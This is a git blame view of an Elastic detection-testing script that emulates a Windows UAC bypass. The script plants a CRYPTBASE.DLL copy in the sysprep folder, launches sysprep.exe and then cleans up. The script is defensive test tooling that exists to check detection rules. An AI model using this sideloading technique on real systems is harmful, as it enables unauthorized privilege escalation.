Files
sigma-rules/rta/uac_sysprep.py
T

39 lines
1.0 KiB
Python
Raw Normal View History

2020-06-29 23:07:16 -06:00
# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
2021-03-03 22:12:11 -09:00
# or more contributor license agreements. Licensed under the Elastic License
# 2.0; you may not use this file except in compliance with the Elastic License
# 2.0.
2020-06-29 23:07:16 -06:00
# Name: Bypass UAC via Sysprep
# RTA: uac_sysprep.py
# ATT&CK: T1088
# Description: Use CRYPTBASE.dll opportunity to do Dll Sideloading with SysPrep for a UAC bypass
from . import common
2022-09-08 12:50:39 -04:00
from . import RtaMetadata
2020-06-29 23:07:16 -06:00
metadata = RtaMetadata(
uuid="72e0a6ca-5b2d-48f6-9d6f-a879ace9cdae",
platforms=["windows"],
endpoint=[],
siem=[],
techniques=[]
)
2022-09-08 12:50:39 -04:00
2023-10-03 10:47:58 -04:00
@common.requires_os(*metadata.platforms)
2020-06-29 23:07:16 -06:00
def main():
common.log("Bypass UAC with CRYPTBASE.dll")
2022-09-08 12:50:39 -04:00
common.copy_file(
"C:\\windows\\system32\\kernel32.dll",
"C:\\Windows\\system32\sysprep\\CRYPTBASE.DLL",
)
2020-06-29 23:07:16 -06:00
common.execute(["C:\\Windows\\system32\sysprep\\sysprep.exe"], timeout=5, kill=True)
common.remove_file("C:\\Windows\\system32\sysprep\\CRYPTBASE.DLL")
if __name__ == "__main__":
exit(main())